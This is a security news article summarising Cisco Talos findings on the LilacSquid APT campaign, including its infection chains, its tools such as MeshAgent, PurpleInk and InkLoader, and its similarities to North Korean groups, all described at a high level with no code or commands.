In a recent development, researchers at Cisco Talos have uncovered a new data theft campaign conducted by an advanced persistent threat (APT) actor known as “LilacSquid.” This insidious campaign has been active since at least 2021 and has targeted a wide range of industries across different regions, including IT organizations in the United States, energy companies in Europe, and pharmaceutical firms in Asia. The strategic victimology of LilacSquid indicates that it is indifferent to specific industry sectors, with the primary goal of stealing valuable data from diverse sources.
The modus operandi of the LilacSquid campaign involves the clever utilization of open-source tools and customized malware. Specifically, they use MeshAgent, an open-source remote management tool, and a modified version of QuasarRAT called “PurpleInk” as the main implants after compromising vulnerable application servers that are exposed to the internet. By exploiting vulnerabilities in public-facing application servers and compromised Remote Desktop Protocol (RDP) credentials, LilacSquid deploys a variety of open-source tools and customized malware, including MeshAgent, SSF, PurpleInk, and loaders like InkBox and InkLoader.
One of the key strategies employed by LilacSquid is to establish long-term access within compromised organizations to facilitate the theft of valuable data. Researchers at Talos have confidently stated that LilacSquid has been operational since at least 2021, focusing on infiltrating organizations across Asia, Europe, and the United States in sectors such as pharmaceuticals, oil and gas, and technology. The campaign utilizes two primary infection chains: exploiting vulnerable web applications and utilizing compromised RDP credentials to gain access.
Once a system is compromised, LilacSquid deploys a range of access tools, including MeshAgent, SSF, InkLoader, and PurpleInk. MeshAgent, which is downloaded using the bitsadmin utility, connects to the command and control (C2) server, performs reconnaissance, and activates other malicious implants. On the other hand, InkLoader, a .NET-based malware loader, is utilized when RDP credentials are compromised, persisting across reboots and executing PurpleInk to further the infection chain tailored for remote desktop sessions.
PurpleInk, a customized version of QuasarRAT used by LilacSquid, has undergone extensive customization since 2021. This customized malware features robust remote access capabilities, including process enumeration, file manipulation, system information gathering, remote shell access, and proxy server communication. Additionally, LilacSquid has modularized the infection chain since 2023, with PurpleInk running as a separate process via InkLoader.
The tactics and procedures employed by LilacSquid show parallels with North Korean APT groups such as Andariel and Lazarus. Andariel is known to use MeshAgent for maintaining post-compromise access, while Lazarus extensively deploys SOCKs proxy and tunneling tools along with custom malware for secondary access and data exfiltration. Similarly, LilacSquid utilizes SSF and other malware to create channels for remote servers.
The LilacSquid campaign exemplifies the ongoing threat posed by sophisticated APT actors who continuously evolve their tactics. By utilizing a combination of open-source tools and customized malware, LilacSquid successfully infiltrates and maintains long-term access to organizations worldwide. With the detection of IoCs related to PurpleInk infection, organizations can strengthen their defenses against the pervasive threat posed by LilacSquid.